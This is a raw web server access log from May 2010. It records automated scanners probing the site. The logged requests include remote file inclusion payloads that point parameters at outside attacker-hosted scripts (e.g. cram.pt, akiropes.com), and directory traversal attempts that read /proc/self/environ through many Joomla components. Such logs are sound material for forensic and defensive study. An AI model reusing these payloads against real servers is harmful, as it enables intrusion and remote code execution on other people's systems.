66.90.73.48 - - [31/May/2010:06:33:57 -0500] "GET /logs//cnt/user_stat.php?DDum=19&MDum=3&YDum=2010/tiny_includes/config.php?dir_ws=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:33:57 -0500] "GET /logs/access_log.1271980800//cnt/user_stat.php?DDum=19&MDum=3&YDum=2010/tiny_includes/config.php?dir_ws=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:33:59 -0500] "GET //cnt/user_stat.php?DDum=19&MDum=3&YDum=2010/tiny_includes/config.php?dir_ws=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:33:59 -0500] "GET /logs//cnt/user_stat.php?DDum=19&MDum=3&YDum=2010/tiny_includes/config.php?dir_ws=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:33:59 -0500] "GET /logs/access_log.1271980800//cnt/user_stat.php?DDum=19&MDum=3&YDum=2010/tiny_includes/config.php?dir_ws=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
173.203.115.77 - - [31/May/2010:06:34:32 -0500] "GET /index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
201.36.173.93 - - [31/May/2010:06:35:14 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:35:14 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
173.203.115.77 - - [31/May/2010:06:35:22 -0500] "GET /logs/index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [31/May/2010:06:35:22 -0500] "GET /index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
74.55.65.134 - - [31/May/2010:06:35:44 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:35:46 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:37:00 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:37:00 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:37:01 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:37:01 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:37:33 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:37:33 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.210.98.40 - - [31/May/2010:06:38:02 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
187.45.193.159 - - [31/May/2010:06:38:05 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
187.45.193.159 - - [31/May/2010:06:38:05 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.159 - - [31/May/2010:06:38:06 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.43.180.250 - - [31/May/2010:06:38:06 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.65.134 - - [31/May/2010:06:39:41 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
187.45.193.159 - - [31/May/2010:06:40:01 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
200.43.180.250 - - [31/May/2010:06:40:13 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
174.121.58.89 - - [31/May/2010:06:40:13 -0500] "GET /logs//index2.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
174.121.58.89 - - [31/May/2010:06:40:13 -0500] "GET //index2.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
91.121.201.191 - - [31/May/2010:06:40:16 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
202.71.108.28 - - [31/May/2010:06:40:34 -0500] "GET /logs/index.php?option=com_projectfork§ion=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:40:34 -0500] "GET /index.php?option=com_projectfork§ion=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:40:34 -0500] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:40:35 -0500] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:40:35 -0500] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:40:36 -0500] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:40:40 -0500] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:40:41 -0500] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
65.49.28.194 - - [31/May/2010:06:40:46 -0500] "GET /logs/Index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
65.49.28.194 - - [31/May/2010:06:40:47 -0500] "GET /Index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
207.46.204.227 - - [31/May/2010:06:40:56 -0500] "GET /logs/access_log.1234483200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.117.209.213 - - [31/May/2010:06:41:14 -0500] "GET /logs/Index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
219.117.209.213 - - [31/May/2010:06:41:14 -0500] "GET /Index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.72.226.120 - - [31/May/2010:06:42:45 -0500] "GET /logs/Index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.72.226.120 - - [31/May/2010:06:42:46 -0500] "GET /Index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.13.96 - - [31/May/2010:06:43:26 -0500] "GET /logs/access_log.1207267200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.71.108.28 - - [31/May/2010:06:44:08 -0500] "GET /logs/access_log.1274227200/index.php?option=com_projectfork§ion=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:44:08 -0500] "GET /logs/access_log.1274227200/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:44:09 -0500] "GET /logs/access_log.1274227200/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
202.71.108.28 - - [31/May/2010:06:44:09 -0500] "GET /logs/access_log.1274227200/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
74.55.65.134 - - [31/May/2010:06:44:18 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:44:18 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:44:18 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
91.121.201.191 - - [31/May/2010:06:45:02 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.250.255.243 - - [31/May/2010:06:45:23 -0500] "GET /logs/access_log.1266451200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.198.96.3 - - [31/May/2010:06:48:27 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
94.198.96.3 - - [31/May/2010:06:48:27 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
209.216.201.8 - - [31/May/2010:06:48:46 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
209.216.201.8 - - [31/May/2010:06:48:46 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
187.45.193.159 - - [31/May/2010:06:48:52 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.18.167.170 - - [31/May/2010:06:48:53 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
213.128.84.14 - - [31/May/2010:06:48:53 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:06:48:53 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:06:48:53 -0500] "GET /logs/access_log.1270512000/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
187.45.193.159 - - [31/May/2010:06:48:53 -0500] "GET //index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.18.167.170 - - [31/May/2010:06:48:53 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
213.128.84.14 - - [31/May/2010:06:48:58 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:06:48:58 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:06:48:58 -0500] "GET /logs/access_log.1270512000/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.128.84.14 - - [31/May/2010:06:48:59 -0500] "GET /logs/access_log.1262563200/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.43.180.250 - - [31/May/2010:06:49:03 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
213.128.84.14 - - [31/May/2010:06:49:04 -0500] "GET /logs/access_log.1262563200/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.43.180.250 - - [31/May/2010:06:49:09 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
80.65.166.74 - - [31/May/2010:06:49:39 -0500] "GET /logs/index.php?id=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [31/May/2010:06:49:40 -0500] "GET /logs/index.php?id=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [31/May/2010:06:49:40 -0500] "GET /logs/index.php?id=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [31/May/2010:06:49:40 -0500] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [31/May/2010:06:49:42 -0500] "GET /index.php?id=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [31/May/2010:06:49:42 -0500] "GET /index.php?id=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [31/May/2010:06:49:43 -0500] "GET /index.php?id=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
80.65.166.74 - - [31/May/2010:06:49:43 -0500] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
66.90.73.48 - - [31/May/2010:06:49:53 -0500] "GET /logs//?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 200 7675 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:49:53 -0500] "GET //?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:49:53 -0500] "GET /logs/access_log.1271635200//?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:49:58 -0500] "GET /logs/access_log.1272153600//?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.65.134 - - [31/May/2010:06:50:12 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:50:13 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:50:13 -0500] "GET /logs//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
219.117.209.213 - - [31/May/2010:06:50:41 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
219.117.209.213 - - [31/May/2010:06:50:42 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.49.28.194 - - [31/May/2010:06:50:52 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.820"
187.45.193.159 - - [31/May/2010:06:50:52 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [31/May/2010:06:50:53 -0500] "GET //index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.49.28.194 - - [31/May/2010:06:50:53 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
74.55.65.134 - - [31/May/2010:06:51:35 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
66.90.73.48 - - [31/May/2010:06:51:35 -0500] "GET /logs/access_log.1271635200//?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:51:35 -0500] "GET //?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
66.90.73.48 - - [31/May/2010:06:51:35 -0500] "GET /logs//?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 200 7675 "-""Mozilla/5.0"
